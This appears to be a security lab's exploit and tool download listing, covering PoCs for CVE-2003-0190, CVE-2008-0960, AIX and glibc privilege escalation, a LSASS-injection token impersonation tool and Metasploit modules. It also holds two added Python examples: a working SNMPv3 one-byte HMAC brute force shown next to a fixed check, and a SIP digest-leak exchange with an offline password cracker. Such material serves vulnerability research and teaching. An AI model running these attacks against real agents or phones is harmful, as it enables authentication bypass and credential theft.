CVE-2003-0190 PoC
Proof of Concept for CVE-2003-0190: timing attack (valid username enumeration) against OpenSSH-portable <= 3.6.1p1 built with PAM support.
- http://lab.mediaservice.net/code/ssh_brute.c
MD5: 4fbc9a1fb23e828b1fe42ff7cc65d1c1
SHA-1: b57f20c0a86c20cda82e8dc169923452fc50225c
- http://lab.mediaservice.net/code/openssh-3.6.1p1_brute.diff
MD5: de3bc1148b93ddb427f6fc721d08a1c0
SHA-1: 9cf2b8a9bcb5e526c071f18e4bd3be5c5b716e35
CVE-2008-0960 Exploit
Proof of Concept for CVE-2008-0960: allows you to bypass authentication on SNMPv3 (tested on Cisco and Net-SNMP) via an HMAC validation error: the agent compares only as many HMAC bytes as the sender supplies, so a 1-byte authentication tag is guessed in at most 256 attempts.
- http://lab.mediaservice.net/code/snmpv3_exp.tgz
MD5: 8b361d84155829c8b08e4342f8db6aa2
SHA-1: 4f011d1dae3b28611700b2e66158ba572d4673a6
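The following is an added example, not code from the lab.mediaservice.net listing or from the snmpv3_exp PoC itself. It reduces the CVE-2008-0960 defect to the USM authentication step: a 12-byte HMAC-MD5-96 tag is checked against only as many bytes as the attacker sent, beside the corrected check. Key localization follows RFC 3414 A.2.1; the serialized message bytes, password and engine ID are constructed placeholders.

```python
# Added example (not from the page or the snmpv3_exp PoC): the USM
# authentication check behind CVE-2008-0960, vulnerable and fixed.
import hashlib
import hmac

TAG_LEN = 12  # HMAC-MD5-96: msgAuthenticationParameters is 12 bytes


def usm_password_to_key(password: bytes, engine_id: bytes) -> bytes:
    """RFC 3414 A.2.1: stretch the password to 1 MiB, MD5 it, then
    localize the result to the authoritative engine ID."""
    stream = (password * (1048576 // len(password) + 1))[:1048576]
    ku = hashlib.md5(stream).digest()
    return hashlib.md5(ku + engine_id + ku).digest()


def auth_tag(auth_key: bytes, whole_msg: bytes) -> bytes:
    """HMAC-MD5 over the whole message (tag field zeroed), cut to 96 bits."""
    return hmac.new(auth_key, whole_msg, hashlib.md5).digest()[:TAG_LEN]


class Agent:
    """Minimal stand-in for an SNMPv3 agent's USM authentication step."""

    def __init__(self, password: bytes, engine_id: bytes):
        self.key = usm_password_to_key(password, engine_id)

    def verify_vulnerable(self, whole_msg: bytes, received_tag: bytes) -> bool:
        # The CVE-2008-0960 defect: the comparison length comes from the
        # attacker-controlled msgAuthenticationParameters field, so a 1-byte
        # tag only has to match the first byte of the real HMAC.
        expected = auth_tag(self.key, whole_msg)
        return expected[:len(received_tag)] == received_tag

    def verify_fixed(self, whole_msg: bytes, received_tag: bytes) -> bool:
        # Fix: reject anything that is not exactly 12 bytes, then compare
        # in constant time.
        if len(received_tag) != TAG_LEN:
            return False
        return hmac.compare_digest(auth_tag(self.key, whole_msg), received_tag)


def brute_force_one_byte_tag(verify, whole_msg: bytes):
    """Attacker side: no key needed. Returns (attempts, tag) on success,
    or None if every 1-byte tag is rejected."""
    for b in range(256):
        tag = bytes([b])
        if verify(whole_msg, tag):
            return b + 1, tag
    return None


# Constructed sample: the RFC 3414 A.3.1 test password and engine ID, and a
# placeholder standing in for the serialized SNMPv3 message.
PASSWORD = b"maplesyrup"
ENGINE_ID = bytes.fromhex("000000000000000000000002")
WHOLE_MSG = b"\x30\x2e\x02\x01\x03" + b"<rest of SNMPv3 GET, auth params zeroed>"

if __name__ == "__main__":
    agent = Agent(PASSWORD, ENGINE_ID)
    print("vulnerable agent:", brute_force_one_byte_tag(agent.verify_vulnerable, WHOLE_MSG))
    print("fixed agent:     ", brute_force_one_byte_tag(agent.verify_fixed, WHOLE_MSG))
```

Against the vulnerable check the loop succeeds as soon as the guessed byte equals the first byte of the real HMAC; against the fixed check every 1-byte tag is refused before any comparison takes place.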
CVE-2009-2669 Exploit
A certain debugging component in IBM AIX 5.3 and 6.1 does not properly handle the (1) _LIB_INIT_DBG and (2) _LIB_INIT_DBG_FILE environment variables, which allows local users to gain privileges by leveraging a setuid-root program to create an arbitrary root-owned file with world-writable permissions, related to libC.a (aka the XL C++ runtime library) in AIX 5.3 and libc.a in AIX 6.1.
- http://lab.mediaservice.net/code/raptor_libC
MD5: 76e604345f2e99e39c7638ebf04d985d
SHA-1: 4c5b8c3876db39d2c6664adf8892f139f1fbb2b3
CVE-2010-3856 Exploit
ld.so in the GNU C Library (aka glibc or libc6) before 2.11.3, and 2.12.x before 2.12.2, does not properly restrict use of the LD_AUDIT environment variable to reference dynamic shared objects (DSOs) as audit objects, which allows local users to gain privileges by leveraging an unsafe DSO located in a trusted library directory, as demonstrated by libpcprofile.so (CVE-2010-3856).
- http://lab.mediaservice.net/code/raptor_ldaudit
MD5: 8258ca708474ed86adb154c899bb1c12
SHA-1: a18a591faff0382ac3a54522acf3ee709e3b7d44
- http://lab.mediaservice.net/code/raptor_ldaudit2
MD5: cce9edfc7ff62c900a5aff57a50caf2b
SHA-1: 3761f7987e39960d329c1bfa7e80f3c90c0c04ec
Cachedump - Metasploit Module
Cachedump post exploitation module for Metasploit.
- http://lab.mediaservice.net/code/cachedump.rb
MD5: 7676ddb35782a51da4ad6570234cfe44
SHA-1: 8448cb6db982d767f37866d37d1b9d9645cf6339
Juniper Secure Access URL decoder/encoder
Juniper "Mask hostnames while browsing" URL decoder/encoder (DanaInfo or url variables).
- http://lab.mediaservice.net/code/junidec.c
MD5: 94424ac3e1e33dfe67031818b43b3319
SHA-1: 2a48898d9dc3ef4c5e6861c2fa487e97b43b9f85
RunAsUser v0.5
RunAsUser uses DLL injection into the LSASS.EXE process to gain SYSTEM privileges, then duplicates the security token of a target process and runs an arbitrary program with it, effectively impersonating the owner of the target process.
- http://lab.mediaservice.net/code/RunAsUser.zip
MD5: 32872e88252169d3a1f25455f8480ec3
SHA-1: f84883a463b12427b438213326e57a465fccd973
Singsing
Singsing is a SYN scan library: small, fast and compatible. The asynchronous SYN scanner zucca was built on its core engine.
- Singsing project page: http://lab.mediaservice.net/code/singsing/
SIP digest leak - Metasploit module
Metasploit module for the SIP digest leak discovered by EnableSecurity. The module places a fake call to the phone; when the user hangs up, the phone sends a BYE. If the module answers that BYE with a 401/407 challenge, the phone resends the BYE with a digest Authorization header, whose response value can then be cracked offline.
- http://lab.mediaservice.net/code/sip_digest_leak.rb
MD5: 2a15b976098f1c42f60107e03d110089
SHA-1: e297d4b1fa12cc9bf5f78f31aaf9efa261eea7ff
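The following is an added example, not code from the lab.mediaservice.net listing or from sip_digest_leak.rb (the real module is written in Ruby; Python is used here so the exchange runs offline). It plays both sides of the exchange described above: the phone's first BYE, the attacker's 407 challenge, the phone's second BYE carrying the digest, then parses the leaked Proxy-Authorization header and tests it against a wordlist. Every SIP message, the extension 1001, the realm, the nonce and the password are constructed for illustration; the module's own message templates are not reproduced.

```python
# Added example (not from the page or sip_digest_leak.rb): the SIP digest
# leak exchange, the leaked header parsed, and an offline wordlist check.
import hashlib
import re
from typing import Optional


def _md5(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def digest_response(username, realm, password, method, uri, nonce,
                    qop=None, nc=None, cnonce=None) -> str:
    """RFC 2617 digest as used by SIP (RFC 3261 section 22)."""
    ha1 = _md5(f"{username}:{realm}:{password}")
    ha2 = _md5(f"{method}:{uri}")
    if qop:
        return _md5(f"{ha1}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}")
    return _md5(f"{ha1}:{nonce}:{ha2}")


def build_407(nonce: str, realm: str) -> str:
    """Attacker's reply to the phone's first BYE: a challenge, not 200 OK."""
    return ("SIP/2.0 407 Proxy Authentication Required\r\n"
            f'Proxy-Authenticate: Digest realm="{realm}", nonce="{nonce}", algorithm=MD5\r\n'
            "Content-Length: 0\r\n\r\n")


_PARAM = re.compile(r'(\w+)=(?:"([^"]*)"|([^,\s]+))')


def parse_digest_params(sip_msg: str, header: str) -> Optional[dict]:
    """Pull the digest parameters out of e.g. Proxy-Authorization."""
    m = re.search(rf"^{header}:\s*Digest\s+(.*)$", sip_msg, re.M | re.I)
    if not m:
        return None
    return {k: (q if q else t) for k, q, t in _PARAM.findall(m.group(1).rstrip("\r"))}


def phone_second_bye(first_bye: str, challenge: str, password: str) -> str:
    """Constructed stand-in for the phone: on 407, repeat the BYE with credentials."""
    ch = parse_digest_params(challenge, "Proxy-Authenticate")
    username = re.search(r"^From:.*?sip:([^@>]+)@", first_bye, re.M).group(1)
    uri = first_bye.split(" ", 2)[1]
    resp = digest_response(username, ch["realm"], password, "BYE", uri, ch["nonce"])
    auth = (f'Proxy-Authorization: Digest username="{username}", realm="{ch["realm"]}", '
            f'nonce="{ch["nonce"]}", uri="{uri}", response="{resp}", algorithm=MD5\r\n')
    head, body = first_bye.split("\r\n\r\n", 1)
    return head + "\r\n" + auth + "\r\n" + body


def crack_digest(params: dict, method: str, wordlist) -> Optional[str]:
    """Offline: recompute the response for each candidate password."""
    for candidate in wordlist:
        r = digest_response(params["username"], params["realm"], candidate, method,
                            params["uri"], params["nonce"], params.get("qop"),
                            params.get("nc"), params.get("cnonce"))
        if r == params["response"]:
            return candidate
    return None


# Constructed sample: the BYE the phone sends when the user hangs up.
FIRST_BYE = (
    "BYE sip:attacker@198.51.100.7 SIP/2.0\r\n"
    "Via: SIP/2.0/UDP 192.0.2.10:5060;branch=z9hG4bK776asdhds\r\n"
    "From: <sip:1001@192.0.2.10>;tag=a6c85cf\r\n"
    "To: <sip:attacker@198.51.100.7>;tag=1928301774\r\n"
    "Call-ID: a84b4c76e66710\r\n"
    "CSeq: 2 BYE\r\n"
    "Content-Length: 0\r\n\r\n"
)


def run_demo(password="1234", wordlist=("0000", "admin", "1234", "5555")):
    nonce = "0a4f113b"  # constructed; a real tool should pick a fresh random nonce
    challenge = build_407(nonce, "asterisk")
    leaked_bye = phone_second_bye(FIRST_BYE, challenge, password)
    params = parse_digest_params(leaked_bye, "Proxy-Authorization")
    return params, crack_digest(params, "BYE", wordlist)


if __name__ == "__main__":
    params, cracked = run_demo()
    print("leaked:", params)
    print("cracked password:", cracked)
```

The method string fed to the digest is "BYE", since that is the request the phone authenticated; using "INVITE" or "REGISTER" here is the usual mistake when reusing a registration cracker on this leak.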
WarVOX patch
Patch for iaxrecord (WarVOX 1.0.1) that enables the test mode of the iaxclient library (version 2.2.x required), so an audio device is no longer needed.
- http://lab.mediaservice.net/code/iaxrecord_patch.diff
MD5: f131f03ba5a877ace17329ba2d40cb85
SHA-1: e622316c7345d47d846dfb98d8ddaa055f2154c2